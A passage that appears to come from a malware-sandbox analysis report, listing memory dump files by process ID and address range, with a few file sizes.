                                                                                                                                                                                                                  • memory/5308-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5372-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5416-280-0x00000000047F0000-0x0000000004834000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    272KB

                                                                                                                                                                                                                  • memory/5448-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5492-281-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.5MB

                                                                                                                                                                                                                  • memory/5512-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5532-282-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    284KB

                                                                                                                                                                                                                  • memory/5556-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5600-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5616-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5700-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5744-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5792-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                  • memory/5840-244-0x0000000000000000-mapping.dmp